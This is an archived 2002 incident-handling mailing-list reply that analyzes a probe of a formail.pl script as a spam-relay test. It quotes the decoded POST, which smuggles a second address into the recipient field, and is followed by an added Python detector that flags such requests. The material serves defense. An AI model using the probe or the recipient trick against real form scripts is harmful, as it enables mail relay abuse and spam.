Hi Russell

I don't see any fancy unicode or DOS commands in here, so I would say it is a relatively harmless probe for open formmail relays, probably for spam use. There are a number of automated tools that look for old formail.pl programs to exploit as relays.

The POST translated to plain text follows (the backslash breaks are mine for readability):

---------------------------------------------------------------
POST /cgi-bin/formail.pl HTTP/1.0
Via: 1.0 SERVER
Connection: Keep-Alive
Content-Length: 402
User-Agent: Mozilla/4.06 (Win95; I)
Content-Type: application/x-www-form-urlencoded
Host: www.cs.auckland.ac.nz
Accept: image/gif, image/x-xpixmap, image/jpeg, application/msword, */*
Referer: www.cs.auckland.ac.nz

email=daa18at_private&recipient=<iikestyxat_private>www.cs.auckland.ac.nz\
&subject=www.cs.auckland.ac.nz/cgi-bin/formail.pl oxy52\
&= time/date: 08:20:19pm / 09/04/2002 <A HREF="www.cs.auckland.ac.nz/cgi-bin/formail.pl">\
www.cs.auckland.ac.nz/cgi-bin/formail.pl</A> oxy52
---------------------------------------------------------------

It seems to be probing formail and getting it to send an Email back to the spammer containing a URL for the vulnerable formail. I've checked Google for "oxy52" but found nothing, it's probably just a tag for whoever is receiving the mail.

Kerry

Russell Fulton said:
> Hi All,
> Over the last week or so snort has been picking up many probes like
> this:
> [snip]

--
Kerry Thompson, CISSP
Information Systems Security Consultant
http://www.crypt.gen.nz
kerryat_private

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
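As an added defender-side illustration (not part of Kerry's message or of any tool named above), the following Python checks a form-to-mail POST for the traits this probe shows: a client-supplied recipient outside the site's own domains, angle brackets in the recipient, and a subject or extra field that echoes the script's own URL. The sample body is reconstructed from the POST quoted above, with example.net placeholder addresses standing in for the ones the archive masked.

```python
import re
from urllib.parse import parse_qs, urlencode

# Script names that form-to-mail probes typically target (formail.pl, formmail.cgi, ...)
FORMMAIL_PATH = re.compile(r"/form-?m?ail(\.pl|\.cgi)?$", re.IGNORECASE)
ADDRESS = re.compile(r"[\w.+-]+@([\w-]+(?:\.[\w-]+)+)")
HTML_ANCHOR = re.compile(r"<a\s+href", re.IGNORECASE)

# Constructed sample: the POST body quoted in the message, re-encoded, with
# example.net placeholders where the archive masked the real addresses.
SAMPLE_BODY = urlencode({
    "email": "daa18@example.net",
    "recipient": "<probe@example.net>www.cs.auckland.ac.nz",
    "subject": "www.cs.auckland.ac.nz/cgi-bin/formail.pl oxy52",
    "": 'time/date: 08:20:19pm / 09/04/2002 '
        '<A HREF="www.cs.auckland.ac.nz/cgi-bin/formail.pl">'
        'www.cs.auckland.ac.nz/cgi-bin/formail.pl</A> oxy52',
})

def analyze_formmail_post(path, body, local_domains):
    """Return the reasons a POST to a form-to-mail script looks like a relay
    probe; an empty list means nothing suspicious was found."""
    reasons = []
    if not FORMMAIL_PATH.search(path):
        return reasons                     # not a form-to-mail script
    fields = parse_qs(body, keep_blank_values=True)
    recipient = " ".join(fields.get("recipient", []))
    subject = " ".join(fields.get("subject", []))
    # A recipient chosen by the client and outside our own domains is the
    # defining trait of an open relay: mail goes wherever the sender says.
    allowed = {d.lower() for d in local_domains}
    for domain in ADDRESS.findall(recipient):
        if domain.lower() not in allowed:
            reasons.append(f"recipient outside local domains: {domain}")
    # Angle brackets let a hostname be appended after the real address to
    # fool naive "must end in our domain" checks, as in the quoted probe.
    if "<" in recipient or ">" in recipient:
        reasons.append("angle brackets in recipient field")
    # The probe wants the vulnerable script's own URL mailed back to the
    # sender, so the subject or another field echoes the request path.
    script = path.rsplit("/", 1)[-1].lower()
    if script in subject.lower():
        reasons.append("subject references the form script itself")
    for name, values in fields.items():
        if name not in ("recipient", "subject") and any(HTML_ANCHOR.search(v) for v in values):
            reasons.append(f"HTML anchor in field {name!r}")
    return reasons

if __name__ == "__main__":
    for reason in analyze_formmail_post("/cgi-bin/formail.pl", SAMPLE_BODY, {"cs.auckland.ac.nz"}):
        print("suspicious:", reason)
```

Run against web-server access logs with request bodies (or a proxy capture), a non-empty result on a form-to-mail path is worth an alert; a legitimate submission that mails only a local address produces none.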
This archive was generated by hypermail 2b30 : Thu Sep 05 2002 - 14:18:55 PDT